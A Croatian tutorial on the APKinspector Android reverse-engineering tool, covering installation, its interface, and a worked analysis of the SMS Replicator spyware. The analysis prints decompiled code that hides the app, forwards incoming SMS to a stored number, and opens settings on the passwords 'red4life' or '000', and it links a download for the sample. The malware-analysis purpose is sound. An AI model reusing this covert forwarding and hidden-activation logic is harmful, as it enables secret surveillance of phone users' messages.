1. Uvod

APKinspector je slobodno dostupni alat za reverzni inženjering i analizu zloćudnih programa namijenjenih Androidu. Sadrži grafičko sučelje kojim se može prikazati struktura programskih modula što analitičarima omogućava odabir programa sigurnih za korištenje.

APKinspector može biti koristan dodatak alatima koji se koriste za forenziku zloćudnih programa. Pomaže stvarati izvješća za dopuštenja koje koristi program, traženje i filtriranje Stringova, razreda i metoda, preimenovanje korisnika itd. Neki od trenutačnih modela korištenih od APKinspectora su temeljeni na Androguardu.

Cilj projekta APKinspector je pomoć analitičarima i reverznim inženjerima da vizualiziraju kompajlirane Android pakete i njihove odgovarajuće DEX kodove. Korisnicima pruža i analitičke i grafičke funkcije da bi se stekao duboki uvid u zloćudni program.

Pruža sljedeće mogućnosti:

 • CFG

 • Poziv grafa

 • Statička instrumentalizacija

 • Analiza dozvola

 • Dalvik kodove

 • Smali kodove

 • Java kodove

 • APK informacije

Projekt je napravio Cong Zheng za vrijeme Google Summer of Code 2011. godine, a nadogradio ga je Yuan Tian za vrijeme Google Summer of Code 2012. godine. Napisan je u Pythonu, a koristi se framework PyQT jer pruža potpuno sučelje QT programima i python može jednostavno uzajamno djelovati s Androguardom.2. Izgradnja i instalacija programa APKinspector

Projekt se može preuzeti na stranici https://github.com/honeynet/apkinspector/ , a trenutno je još u alpha fazi s, nažalost, nekolicinom bugova.

2.1. Izgradnja i instalacija zavisnosti programa

2.1.1. Instalacija Pythona

Da bi se program mogao uspješno pokrenuti, potrebno je imati podršku za programski jezik Python. Da bi naredni koraci mogli biti uspješno izvršeni, preporučuje se instalacija Pythona 2.7 koji se može dohvatiti na sljedećoj poveznici:

https://www.python.org/downloads/

Napomena. Potrebno je preuzeti inačicu 2.7.*, a korisnik sam odabire između ponuđenih platformi

2.1.2. Instalacija QT SDK

Potrebno je dohvatiti QtSDK sa stranice https://www.qt.io/download/ gdje korisnik može odabrati varijantu programa (Community, Indie Mobile, Proffesional, Enterprise). Preporučuje se odabir Community varijante jer za nju ne treba licenca, dok za druge treba.

 1. Windows korisnici

  Windows korisnici instaliraju program pokretanjem .exe datoteke. Nakon toga još moraju podesiti varijablu okruženja, a to se uradi tako da se ide u System (na Windows 8 se to uradi desnim klikom na Start ikonu te klikom na System), zatim se odabere Advanced System Settings te se u slijedom iskočenom prozoru odabere Environment Variables... . Nakon što iskoči još jedan prozor, treba se osigurati da je odabrana varijabla PATH te se klikne na EDIT... i na kraju Variable value: se doda „;folder_gdje_je_instaliran_Qt/verzija/alat_programiranja/bin;“ (bez navodnika).

  Pr. 1. „;C:\Qt\5.3\android_armv7\bin;“

  Napomena. Korisnici trebaju pripaziti da ne ostavljaju prostora ispred prethodnog puta, dvotočke i puta koji dodaju jer u suprotnom neće ispravno raditi.

  Pr. 2. Neispravno

  „prvi_put; drugi_put“

  Pr. 3. Ispravno

  „prvi_put;drugi_put“

 2. Linux korisnici

  Linux korisnici trebaju pokrenuti .run datoteku pritom koristeći root dozvolu. Nakon toga moraju namjestiti postavke okruženja, a to se napravi tako da se doda sljedeći kod na kraju /etc/profile :

  QTDIR=/opt/QtSDK/Desktop/Qt/473/gcc
  PATH=$QTDIR/bin:$PATH
  LD_LIBRARY_PATH=$QTDIR/lib:$LD_LIBRARY_PATH
  Export QTDIR PATH LD_LIBRARY_PATH

  Zatim se spremi i izađe te se izvrše naredbe „source /etc/profile“ te „sudo updatedb“. Ako se može izvršiti naredba „qmake -v“ i pritom se prikaže informacija verzije, znači da je Qt uspješno instaliran.

2.1.3. Instalacija SIP-a
 1. Windows korisnici

  Windows korisnici ovaj korak mogu preskočiti te otići na sljedeći.

 2. Linux korisnici

  Linux korisnici mogu preuzeti SIP sa stranice http://www.riverbankcomputing.com/software/sip/download . Nakon toga, prvo se treba instalirati python-dev da ne bi bilo grešaka tijekom izvršavanja naredbe make. Zatim se u konzoli dođe do direktorija koji sadrži preuzete datoteke te se trebaju izvršiti naredbe sljedećim redoslijedom:

  python configure.py
  make
  make install

2.1.4. Instalacija PyQTx

PyQTx se preuzima sa stranice http://sourceforge.net/projects/pyqt/files/. Preporučuje se preuzimanje PyQT4.

 1. Windows korisnici

  Windows korisnici trebaju obratiti posebnu pažnju na dohvaćanje ispravne verzije, odnosno verzije specifične za Python 2.7.

 2. Linux korisnici

  Linux korisnici dohvaćaju inačicu *-x11-*.tar.gz te nakon toga redom izvršavaju sljedeće naredbe:

  tar xvfz PyQT-x11-verzija.tar.gz (umjesto verzija ide verzija dohvaćene datoteke, npr. gpl-4.8.4)
  python configure.py –g (zatim se odabere „yes“)
  make
  make install

2.1.5. Instalacija alata pip

Ovo je opcionalan, ali preporučljiv korak jer olakšava daljnje korake. Dohvati se get-pip.py sa stranice https://pip.pypa.io/en/latest/installing.html, te dohvaćena datoteka instalira pip naredbom python get-pip.py.

2.1.6. Instalacija alata Graphviz

Graphviz se dohvaća sa stranice http://www.graphviz.org/Download.php. Na dnu te stranice se klikne na Agree te se dohvati inačica za željenu platformu.

 1. Windows korisnici

  Windows korisnici instaliraju program pokretanjem .exe datoteke.

 2. Linux korisnici

  Linux korisnici izvršavaju redom ove naredbe:

  ./configure –with-ortho=yes
  make
  make install

  U oba slučaja potrebno je dodati instalacijski_folder/bin pod varijable okruženja kako je to opisano u koraku 2.1.2.

2.1.7. Instalacija alata pydot

Pydot se instalira izvršavanjem sljedećih naredbi (neovisno o OS-u):

pip install –Iv htpps://pypi.python.org/packages/source/p/pyparsing/pyparsing-1.5.7.tar.gz#md5=9be0fcdcc595199c646ab317c1d9a709
pip install pydot

2.1.8. Instalacija alata apktool

Apktool se preuzima sa sljedeće stranice https://code.google.com/p/android-apktool/ .

 1. Windows korisnici

  Windows korisnici prvo trebaju dohvatiti skriptu za omatanje sa sljedeće stranice https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/windows/apktool.bat te nakon toga dohvaćaju apktool-2 s već prethodno navedene stranice. Dohvaćeni apktool-2 se preimenuje u apktool (ekstenzija mora biti .jar) te se apktool.bat i apktool.jar spremaju u proizvoljni privremeni direktorij, a nakon dohvaćanja projekta, u direktorij u kojemu se projekt spremio.

 2. Linux korisnici

  Linux korisnici prvo dohvaćaju skriptu za omatanje sa sljedeće stranice https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool te nakon toga dohvaćaju apktool-2 kojega se treba preimenovati u apktool (ekstenzija mora biti .jar). Nakon toga se obje datoteke moraju premjestiti u /usr/local/bin (potrebna je root dozvola). Treba osigurati da se obje datoteke mogu izvršiti (naredba chmod +x).

2.2. Pokretanje alata

Dohvati se projekt sa stranice projekta te se u datoteci pokrene alat startQT naredbom python startQT.py. Korisnicima Windowsa se preporučuje da prouče poglavlje 5 ovog dokumenta u slučaju nefunkcionalnog rada programa.

Napomena. Moguće je da će nakon ovih koraka trebati instalirati python lib zavisnosti. Vjerojatno će trebati instalirati ipython ( pip install ipython ), numpy ( pip install numpy ) te python-scipy ( pip install git+htpp://github.com/scipy/scipy/ ).3. Grafičko sučelje

Izgled glavnog prozora prikazan je na slici 3.1, a prozor se može podijeliti na 4 logičke cjeline:

 1. Meni

 2. Glavna alatna traka

 3. Glavni prozor

 4. Sporedni prozor

Slika 3.1. Grafičko sučelje

3.1. Meni

Meni omogućuje sljedeće opcije:

 1. File(F) – pruža mogućnosti otvaranja nove .apk datoteka, otvaranja spremljene analize, spremanja analize te izlaska iz programa

 2. Edit(E) – pruža skup naredbi za rad s textom (Undo, Cut, Copy, Paste, All)

 3. Tools(T) – pruža opcije traženja teksta te postavki Call in/out što će biti objašnjeno u nastavku teksta

 4. Setting(S) – pruža opciju postavki programa

 5. Help(H) – pruža informacije o tvorcima programa

Slika 3.2. Meni

3.2. Glavna alatna traka

Funkcionalnosti glavne alatne trake su navedene u tablici 3.2.1.

Ikona u alatnoj traci

Ime stavke alatne trake

Pristup stavci preko menija

Opis

New(N)

File -> New

Otvaranje nove .apk datoteke

Open(O)

File -> Open

Otvaranje analize

Save(S)

File -> Save

Spremanje analize

Backward

-

Pomak na prethodnu analizu

Forward

-

Pomak na sljedeću analizu

BuildAPK

-

Izgradnja APK-a

Tablica 3.1. Funkcionalnosti glavne trake

3.3. Glavni prozor

Glavni prozor je središnji prozor namijenjen statičnoj analizi zloćudnog programa. Sadrži sljedeće kartice:

 • CFG (Control Flow Diagram)

 • Dalvik

 • ByteCode

 • Smali

 • Java

 • Call in/out

 • Permission

 • AndroidManifest.xml

Slika 3.3. Glavni prozor

3.3.1. CFG

Kartica grafa kontrole toka grafički prikazuje kontrolu toka Android programa. Zumiranje i povlačenje grafa je jednostavno omogućeno korištenjem računalnog miša. Kod u CFG-u je formatirani Dalvik kod. Pritiskom tipke Space, kada se odabere čvor na grafu, skače se na pogled koda. Ovo svojstvo je omogućeno Androguardom.

3.3.2. Dalvik

Kartica Dalvik omogućuje pregled Dalvik koda. Dalvik je virtualni stroj koji može pokretati programe i kodove napisane u Javi. Standardni Java kompajler prevađa izvorni kod u Bytekod, a zatim se on kompajlira u .dex datoteku koju virtualni stroj Dalvik može čitati i koristiti. Dalvik kod dopušta pogled u to koji operacijski kod je nastao iz kojeg Java koda, tako da, kada nastane pogreška, trag stoga daje korisnu informaciju gdje je nastala ta pogreška.

Korisnik se može prebaciti u grafički prikaz desnim klikom miša te odabirom na “Goto CFG”. Također omogućuje pisanje bilješki, a linija bilješke je namijenjena da odgovara liniji Dalvik koda.

Ova kartica daje korisniku slobodu da preimenuje Stringove u Dalvik kodu, a originalno ime je sadržano u tablici za buduće upućivanje. Ta preinaka će biti vidljiva i u CFG-u.

3.3.3. ByteCode

ByteCode kartica prikazuje “sirove” Dalvik bytekodove, a omogućuje i pisanje komentara. Ovo svojstvo je omogućeno Androguardom.

3.3.4. Smali

Smali kartica prikazuje formatiran Smali kod te se također mogu pisati komentari. Može se odabrati Smali metoda da bi dobio Call in/out pogled. Ovo svojstvo je omogućeno alatima apktool i baksmali.

3.3.5. Java

Kartica Java dopušta analitičarima pregled Java interpretacije izvora. Ovo svojstvo je u trenutku pisanja omogućeno alatima dex2jar i JAD, no tvorci projekta rade na tome da se koristi alat DED.

3.3.6. Call in/out

Kartica Call in/out prikazuje odakle je određena metoda pozvana ili koje druge metode ona poziva.

3.3.7. Permission

Kartica dozvola prikazuje tražene dozvole te gdje su, u izvorišnoj datoteci, upućivane. Alat koji omogućuje ovo svojstvo je Androguard.

3.3.8. AndroidManifest.xml

Kartica AndroidManifest.xml prikazuje potpunu AndroidManifest.xml datoteku.

3.4. Sporedni prozor

Sporedni prozor sadrži 5 kartica, tekstualno polje te dva radio gumba. Kartice su:

 1. Files

 2. Strings

 3. Classes

 4. Methods

 5. APKInfo

, a radio gumbi su:

 1. Filter

 2. Search

Slika 3.4. Kartice

3.4.1. Files

Kartica datoteka prikazuje sve izvorišne datoteke sadržane u paketu.

3.4.2. Strings

Kartica Stringova prikazuje ASCII Stringove u paketu.

3.4.3. Classes

Kartica razreda prikazuje razrede sadržane u paketu.

Methods

Kartica metoda prikazuje stablasti pogled paketa programa namijenjenog za android do listova koji sadržavaju metode.

3.4.5. APKInfo

Ovdje su sadržane sve globalne informacije o .apk datoteci te alatima. Sadrži informacije kao što sui me datoteke, verzija koda, ime verzije, paketi, primatelji, servisi te dozvole.

3.4.6. Radio gumbi

Radio gumbi Search i Filter omogućuju analitičarima da brzo pretražuju Stringove, metode, razrede te datoteke.

Slika 3.5. Radio gumbi4. Primjer analize zloćudnog programa

Kao primjer se analizira zloćudni program SMS Replicator. Program je bio dostupan na GooglePlayu po cijeni od $4.99, a služi za špijuniranje, odnosno tajno slanje SMS poruka na bilo koji odabrani broj mobitela. Program, nakon preuzimanja i instalacije, sakrije se tako da ne pokazuje nikakvu ikonu ili procese vidljive korisniku. Također je stizao s deaktivacijskom lozinkom kojom bi se korisniku omogućio ulaz u postavke radi mijenjanja lozinke, broj mobitela na koji će se SMS proslijediti ili pak aktivacija/deaktivacija samog programa. Program je izbačen iz GooglePlaya nekoliko sati nakon distribucije. Može se preuzeti sa sljedeće stranice:

http://getandroidstuff.com/download-sms-replicator-android-secret-spy-app/

4.1. Zadatak

Zadatak ove analize je instalirati program te zatim korištenjem programa APKinspector ustanoviti segmente zloćudnog koda.

4.2. Instalacija programa

Budući da će u analizi ovog programa biti potrebno slati lažirane SMS poruke na virtualni uređaj, koristit će Android Virtual Device koji se nalazi u razvojnim alatima za Android, odnosno SDK-u (engl. Software Development Kit).

AVD se može pokrenuti unutar integriranog razvojnog okruženja (IDE – engl. Integrated Development Environment), preko komandne linije ili klikom na „AVD Manager.exe” datoteku. U ovoj analizi će se pokrenuti jednostavnim klikom na .exe datoteku, a ona se nalazi u direktoriju gdje je raspakiran SDK, u daljnjem tekstu označen kao <sdk_home_folder>. Ako se ne nalazi tamo, tada „AVD Manager.exe” treba prekopirati iz „<sdk_home_folder>/tools/lib” u „<sdk_home_folder>”. Otvori se AVD Manager te se kreira novi virtualni uređaj klikom na Create...

Slika 4.1. AVD

Unesu se postavke uređaja te se zatim klikne na OK. Preporučuje se izrada uređaja s minimalnim performansama jer se AVD vrlo sporo učitava.

Slika 4.2. Primjer postavki performansi

Zatim se odabere stvoreni uređaj, klikne se na gumb Start... te u iskočnom prozoru na OK.

Slika 4.3. AVD – pokretanje virtualnog stroja

Slika 4.4. AVD – Launch Options

Nakon nekog vremena, trebao bi se učitati simulirani Android OS.

Slika 4.5. Virtualni uređaj

Program se instalira preko alata adb tako da se uđe u konzolu, dođe do direktorija u kojem je smještena .apk datoteka te zatim izda sljedeća naredba:

adb install <ime_programa>.apk

, odnosno u ovom slučaju s:

adb install SMS_Replicator_Secret.apk

Slika 4.6. Instalacija programa na Android uređaj

4.3. Analiza programa

Nakon instalacije, na Androidu nema naznake da je program instaliran. Ikone za pristup programu nema, pokrenuti servisi ne prikazuju ništa, a tek se pod instaliranim programima vidi da je program uistinu instaliran.

Slika 4.7. Nije vidljiv ni pod programima ni pod procesima

Sljedeći korak je izlistavanje svih procesa preko alata adb. To se uradi izdavanje naredaba:

adb shell
ps

Slika 4.8. Ulazak u shell i naredba ps

No, niti rezultati dobiveni izlistavanjem procesa ne daju naznaku da je program pokrenut.

Slika 4.9. Proces programa nije vidljiv ni alatom adb

Nastavak analize se uradi tako da se otvori APKinspector te u njemu otvori .apk.

Slika 4.10. Otvaranje programa APKinspector

Nakon učitavanja prikazuje se iskočni prozor koji nas upozorava na osjetljiva dopuštenja koja program traži, a to se vidi i u konzoli s koje se pokrene APKinspector. U ovom slučaju se prikazuju tri osjetljiva dopuštenja, a ona su:

android.permission.SEND_SMS
android.permission.RECEIVE_SMS
android.permission.READ_CONTACTS

Slika 4.11. Iskočni prozor koji upozorava na osjetljive dozvole

Slika 4.12. Osjetljive dozvole se vide se vide i u konzoli

Slika 4.13. Izgled prozora s učitanom aplikacijom

Prvi korak rukovanjem programom je analiza datoteke AndroidManifest.xml koja se obavezno nalazi u svakom .apk paketu. Na njoj se, uz osjetljiva dopuštenja koja su se prethodno prikazala, očita i glavna aktivnost. U ovom specifičnom slučaju navedena je aktivnost i primatelj:

                
<activity android:label="@string/app_name" android:name=".SMSReplicatorSecret">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
</intent-filter>
</activity>
<receiver android:name=".SMSReceiver">
<intent-filter>
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>      
                  
              

Dakle, glavna aktivnost aplikacije je SMSReplicatorSecret, a primatelj je SMSReceiver kojemu je akcija android.provider.Telephony.SMS_RECEIVED. Budući da program nema ikone na uređaju, a nema ni otvorenih procesa, sljedeću korak je analiziranje klase SMSReplicatorSecret, za koju je iz Manifesta vidljivo da „sluša” primljene poruku, da se dozna može li se i pod kojim uvjetima doći do upravljanja programom.

Slika 4.14. Rekonstruirani .java izvorni kod

Budući da APKinspector nudi i .java datoteke iz kojih je najlakše razumjeti što se u kodu događa, otvorit će se SMSReceiver.java te će se krenuti s detaljnom analizom. Može se krenuti s dostupnim atributima, a oni su sljedeći:

String DB_ui_pass; 
String DBactivate; 
String DBforwardingNo; 
Activity aa;
Context ct; 
String msg; 
String str; 

Dakle, dobiju se tri String atributa koja su vjerojatno povezana s nekom bazom podataka budući da im ime sadrži DB (engl. Database), atribut aktivnosti i konteksta. Sljedeći je pretpostavljeno važan atribut String kojemu je ime msg što upućuje da bi se u njemu mogla spremiti poruka dok je posljednji atribut String imena str koji ne daje naznaku razloga korištenja.

Prilikom stvaranja razreda uoči se da svi atributi ne poprimaju nikakvu određenu vrijednost:

public SMSReceiver()
  {
    DBforwardingNo = "";
    DBactivate = "";
    DB_ui_pass = "";
    str = "";
    msg = "";
  }                  

Sljedeća metoda u razredu je public void onReceive koja upućuje na to da se izvršava prilikom primitka SMS poruke pa se krene s analizom te metode. Analitičara prvenstveno interesira mjesto pokretanja glavne aktivnosti programa, odnosno razreda SMSReplicatorSecret.java. Utipkavanjem riječi SMSReplicatorSecret dođe se do sljedećeg odsječka koda:

if(
  msg.equalsIgnoreCase(DB_ui_pass) 
  || 
  msg.equalsIgnoreCase("red4life")
  )
  {
    Intent intent1 = 
      new Intent(
      context, com/dlp/SMSReplicatorSecret/SMSReplicatorSecret
      );
        intent1.addFlags(0x10000000);
        context.startActivity(intent1);
  } else if(DBactivate.equalsIgnoreCase("Activate")) {
    label1:
        {
          smsmanager = SmsManager.getDefault();
          stringtokenizer = 
            new StringTokenizer(DBforwardingNo, ",");
          stringbuffer = 
            new StringBuffer(str);
          
          if(stringbuffer.length() <= 160)
            break label0;
          
          for(; stringtokenizer.hasMoreTokens(); 
            smsmanager.sendTextMessage(
              stringtokenizer.nextToken(), null, 
              stringbuffer.substring(0, 0 + 160), 
              null, null
            )
          )
            break label1;
          
          0 + 160;
        }
    }
  }                  

Iz koda je vidljivo da želi li se pokrenuti tu aktivnost, atribut msg mora biti jednak ili varijabli DB_ui_pass koja je vjerojatno lozinka (dio imena pass skraćenica za password) spremljena u bazi podataka (dio imena DB) ili konstanti „red4life” neovisno o velikom i malom slovu.

Od ovog trenutka riješen je prvi zadatak, ali dolaze dva nova:

 1. 1. Otkriti kako se String msg inicijalizira

 2. 2. Otkriti koja je vrijednost varijable DB_ui_pass

Krene se redom:

 1. Inicijalizacija String msg

  
  _L4:
  smsmessage = SmsMessage.createFromPdu((byte[])aobj[i]); 
    uri = 
      Uri.withAppendedPath(
        android.provider.ContactsContract.PhoneLookup.CONTENT_FILTER_URI, Uri.encode(
          smsmessage.getDisplayOriginatingAddress().toString()
        )
      );
    as = new String[1];
    as[0] = "display_name";
    cursor = contentresolver.query(uri, as, null, null, null);
    cursor.moveToFirst();
    System.out.println(
      (new StringBuilder("++++++++++++")).append(cursor.getString(0)).toString()
    );
    
    if(s != null)
      break MISSING_BLOCK_LABEL_420;
      
    s1 = (new StringBuilder("From:"))
        .append(cursor.getString(0))
        .append(":").toString();
    s = s1;
  _L6:
  msg = 
    (new StringBuilder(String.valueOf(msg)))
    .append(smsmessage.getMessageBody().toString()).toString();
    i++;
  
  goto _L5
    indexoutofboundsexception;
      
    if(s == null)
      s = (new StringBuilder("From:"))
          .append(
            smsmessage.getDisplayOriginatingAddress()
            .toString()
          )
          .append(":").toString();
       
  goto _L6
    for(; stringtokenizer.hasMoreTokens(); 
      smsmanager.sendTextMessage(
        stringtokenizer.nextToken(), null, 
        stringbuffer.toString(), 
        null, null
      )
    );
     
  goto _L2
    
  }                  

  Iz odsječka koda je vidljivo da se msg inicijalizira pomoću metode smsmessage.getMessageBody(). Da se pokaže točnost indicija, treba se provjeriti što je točno smsmessage te način stvaranja.

  ...

  SmsMessage smsmessage;

  ...

  Dakle, smsmessage je tipa SmsMessage, a stvara se metodom createFromPdu((byte[])aobj[i]). Za potpunu sigurnost je li to doista SMS poruka, potrebno je provjeriti varijablu aobj[i]:

  
  _L1:
    Object aobj[];
    int i;
    aobj = (Object[])bundle.get("pdus");
    i = 0;
  

  U ovom odsječku koda se saznaje da je aobj tipa Object te se dobiva metodom bundle.get("pdus"). To je ispravna metoda za dohvaćanje SMS poruke. PDU („protocol description unit”) je industrijski format za SMS poruku, a poruka se mora pohraniti u polje jer se može sadržavati od više manjih. Varijabla i se postavi na nulu što znači da se gleda samo prvi član poruke.

  Nakon što je ustanovljena inicijalizacija varijable msg pokušat će se s otvaranjem programa slanjem lažirane poruke, budući da virtualni Android OS ne sadrži SIM karticu, sadržaja „Hello” te „red4life”, odnosno vrijednost koja ne bi trebala izazvati promjenu te vrijednost koja bi trebala izazvati poruku kao što je prethodno navedeno u tekstu.

  Poruka se lažira korištenjem telnet servisa. Otvori se konzola, odnosno command prompt te se upiše sljedeće:

  adb devices
  telnet localhost [port]
  sms send [broj] [sadržaj]

  Adb devices daje informaciju na kojemu portu uređaj sluša, naredbom telnet localhost [port] se spoji na uređaj preko telnet servisa, a sms send [broj] [sadržaj] pošalje uređaju poruku.

  Slika 4.15. Adb devices naredba

  Slika 4.16. Spajanje na telnet

  Kao što je očekivano, poruka sadržaja „Hello“ nije izazvala nikakvu reakciju.

  Slika 4.17. Slanje poruke „Hello“

  Slika 4.18. Nakon poslane poruke, ništa se nije dogodilo

  S druge strane, poruka sadržaja „red4life“ je otvorila aplikaciju i omogućila već navedene opcije.

  Slika 4.19. Slanje poruke „red4life“

  Slika 4.20. Pojava programa

 2. Otkriti vrijednost varijable DB_ui_pass

  Traženjem riječi „DB_ui_pass” dođe se do sljedećeg odsječka koda:

  
  try {
    ShadyDB shadydb = new ShadyDB(context);
    SQLiteDatabase sqlitedatabase = shadydb.getReadableDatabase();
    Cursor cursor1 = s
      qlitedatabase.query(
        "settings", null, null, null, null, null, null
      );
          
    cursor1.moveToFirst();
    DBforwardingNo = 
      cursor1.getString(
        cursor1.getColumnIndex("phone_no")
      );
    DB_ui_pass = 
      cursor1.getString(
        cursor1.getColumnIndex("ui_pass")
      );
    DBactivate = 
      cursor1.getString(
        cursor1.getColumnIndex("activate")
      );
    System.out.println(
      (new StringBuilder("+++++++++++jjj+++++++++++++"))
        .append(DBactivate).toString()
    );
    
    cursor1.close();
    sqlitedatabase.close();
    shadydb.close();
    Log.d("Database:Forwarding Numbers", DB_ui_pass);
  }
  catch(Exception exception){
    Log.d("Database:OnClickListener::", 
      (new StringBuilder(
        "Crap!!failed to Retrieve Information "
        )
      )
        .append(exception.toString()).toString()
    );
  }
  

  Iz koda se primjećuje da se varijabla inicijalizira metodom getString() čiji argument je cursor1 koji poziva metodu getColumnIndex, a ta metoda vraća vrijednost varijable ui_pass. Cursor1 je varijabla tipa Cursor koji je sučelje koje omogućuje slučajan ulazno-izlazni pristup rezultatima postavljenima izrazom baze podataka, a inicijalizira se preko metode sqlilitedatabase.query(...). Sqllitedatabase je varijabla tipa SqlLiteDabase koja pruža metode upravljanja SQLLite bazom podataka, a inicijalizira se pomoću varijable shadydb i njene metode getReadableDatabase. Daljnjom reverznom analizom se saznaje da je shadydb instanca razreda ShadyDB koje je sadržan u paketu programa.

  Dakle, do varijable DB_ui_pass se stiže preko instance razreda ShadyDB koji služi za upravljanje bazom podataka i sadržava varijablu ui_pass u kojoj je zapisana zadana lozinka što dovodi da razred ShadyDB mora biti sljedeći objekt analize.

  Odsječak koda razreda ShadyDB:

  
  public class ShadyDB extends SQLiteOpenHelper{
    public ShadyDB(Context context1)
    {
      super(context1, "shady.db", null, 2);
      context = context1;
    }
    public void onCreate(SQLiteDatabase sqlitedatabase)
    {
      sqlitedatabase.execSQL(
        "create table settings( 
          _id integer primary key autoincrement, 
          phone_no text not null, 
          activate text not null, 
          ui_pass text not null
        );
      ");
      System.out.println(
        "create table settings( 
          _id integer primary key autoincrement, 
          phone_no text not null, 
          activate text not null, 
          ui_pass text not null
        );
      ");
      System.out.println(
        "INSERT INTO settings (
          phone_no, 
          activate, 
          ui_pass
        ) 
        VALUES( 
          '0000', 
          'Activate', 
          '000'
        );".toString()
      );
      sqlitedatabase.execSQL(
        "INSERT INTO settings (
          phone_no, 
          activate, 
          ui_pass
        ) 
        VALUES( 
          '0000', 
          'Activate', 
          '000');
      ");
  
                    

  Razred ShadyDB nasljeđuje razred SQLiteOpenHelper koja je pomoćna klasa za upravljanje bazom podataka. Metoda onCreate se pokrene kada se stvori datoteka baze podataka u njoj se saznaje da se stvori tablica koja sadrži primarni ključ, broj telefona, tekst aktivacije te tražena varijabla ui_pass. Daljnjim prolaskom kroz kod dolazi se do metode execSQL koja izvršava zadani izraz baze podataka, a u vrijednostima (VALUES) se nalazi da je inicijalna vrijednost varijable ui_pass 000. Preostaje provjeriti ispravnost tvrdnji na način koji je već opisan.

  Slika 4.21. Slanje poruke „000”

  Slika 4.22. Program se ponovno otvorio

  Budući da se slanjem sms poruke sadržaja „000” opet otvorio prozor programa, dolazi se do zaključka da je i drugi zadatak uspješno okončan.

  Aktivacijom programa, postane vidljiv i proces što se može vidjeti izdavanjem sljedećih naredbi:

  adb shell
  ps

  Slika 4.23. Proces postaje vidljiv

  Analizom se došlo do pronalaska lozinki za otvaranje programa, a sljedeći zadatak je kako program radi kada je aktiviran. U slučaju primitka poruke sa sadržajem zapisanim u varijabli baze podataka ui_pass ili sadržajem „red4life”, otvorit će se prozor s postavkama, no što će se dogoditi ako se pošalje poruka s drugim sadržajem.

  Budući da razred SMSReceiver obrađuje primljene poruke, opet se krene od njega, ali sada će se pozornost obratiti na drugi dio uvjeta:

  
  try{
    ShadyDB shadydb 
      = new ShadyDB(context);
    SQLiteDatabase sqlitedatabase 
      = shadydb.getReadableDatabase();
    Cursor cursor1 
      = sqlitedatabase.query(
        "settings", null, null, null, null, null, null
      );
    cursor1.moveToFirst();
    DBforwardingNo 
      = cursor1.getString(
        cursor1.getColumnIndex("phone_no")
      );
    DB_ui_pass 
      = cursor1.getString(
        cursor1.getColumnIndex("ui_pass")
      );
    DBactivate 
      = cursor1.getString(
        cursor1.getColumnIndex("activate")
      );
    System.out.println(
      (new StringBuilder("+++++++++++jjj+++++++++++++"))
        .append(DBactivate).toString()
    );
    cursor1.close();
    sqlitedatabase.close();
    shadydb.close();
    Log.d("Database:Forwarding Numbers", DB_ui_pass);
  }
  catch(Exception exception){
    Log.d(
      "Database:OnClickListener::", 
      (new StringBuilder(
        "Crap!!failed to Retrieve Information "
      ))
      .append(exception.toString()).toString()
    );
  }
  if(
    msg.equalsIgnoreCase(DB_ui_pass) 
    || 
    msg.equalsIgnoreCase("red4life")
  ){
    Intent intent1 
      = new Intent(
        context, 
        com/dlp/SMSReplicatorSecret/SMSReplicatorSecret
      );
    intent1.addFlags(0x10000000);
    context.startActivity(intent1);
  }else if(DBactivate.equalsIgnoreCase("Activate")){
    label1: {
      smsmanager = SmsManager.getDefault();
      stringtokenizer 
        = new StringTokenizer(DBforwardingNo, ",");
      stringbuffer 
        = new StringBuffer(str);
      if(stringbuffer.length() <= 160)
        break label0;
          
      for(; stringtokenizer.hasMoreTokens(); 
        smsmanager.sendTextMessage(
          stringtokenizer.nextToken(), 
          null, 
          stringbuffer.substring(0, 0 + 160), null, null)
      )
      break label1;
      
      0 + 160;
    }
  }
  
                    

  U ovom odsječku se vidi da se drugi dio uvjeta poziva poziva samo ako atribut DBactivate sadrži vrijednost „Activate”, a u try odsječku se saznaje da se DBactivate inicijalizira na isti način kao prethodno traženo varijabla DB_ui_pass, no s drugim argumentom – „activate”. Ponovnim pregledom dijela koda u razredu ShadyDB ustvrdi se da se varijabla početno inicijalizirana na vrijednost „Activate”.

  sqlitedatabase.execSQL("INSERT INTO settings (phone_no, activate, ui_pass) VALUES( '0000', 'Activate' , '000');");

  Dakle, uvjet je ispunjen. U if else dijelu se inicijalizira varijabla smsmanager koja je tipa SmsManager, odnosno razreda koji upravlja SMS operacijama kao što je slanje podatkovnih, tekstualnih i pdu SMS poruka. Stringtokenizer je tipa StringTokenizer koji „razbija” riječ u odnosu na određeni delimiter, u ovom slučaju znak ‘,’. Varijabla stringbuffer je tipa StringBuffer, apstrakcije za slijed znakova te se u nju sprema varijabla str koja se dobiva na sljedeći način:

  
  _L4:
    smsmessage 
      = SmsMessage.createFromPdu(
        (byte[]) aobj[i] 
      );
    uri 
      = Uri.withAppendedPath(
        android.provider.ContactsContract
        .PhoneLookup.CONTENT_FILTER_URI,
        Uri.encode(
          smsmessage
            .getDisplayOriginatingAddress().toString()
        )
      );
    as = new String[1];
    as[0] = "display_name";
    cursor 
      = contentresolver.query(
        uri, as, null, null, null
      );
    cursor.moveToFirst();
    System.out.println(
      (new StringBuilder("++++++++++++"))
      .append(cursor.getString(0)).toString()
    );
  
    if(s != null)
      break MISSING_BLOCK_LABEL_420;
      
    s1 = (new StringBuilder("From:"))
        .append(cursor.getString(0))
        .append(":").toString();
    s = s1;
  
  _L6:
    msg = (new StringBuilder(String.valueOf(msg)))
       .append(smsmessage.getMessageBody().toString())
       .toString();
    i++;
    goto _L5
    indexoutofboundsexception;
    
    if(s == null)
      s = (new StringBuilder("From:"))
          .append(
            smsmessage
            .getDisplayOriginatingAddress()
            .toString()
          ).append(":").toString();
       
    goto _L6
    for(; stringtokenizer.hasMoreTokens(); 
      smsmanager.sendTextMessage(
        stringtokenizer.nextToken(),
        null, 
        stringbuffer.toString(), 
        null, 
        null
      )
    );
  
    goto _L2
  }
  
  te:
    str = (new StringBuilder(String.valueOf(s)))
       .append(msg).toString();
  
                    

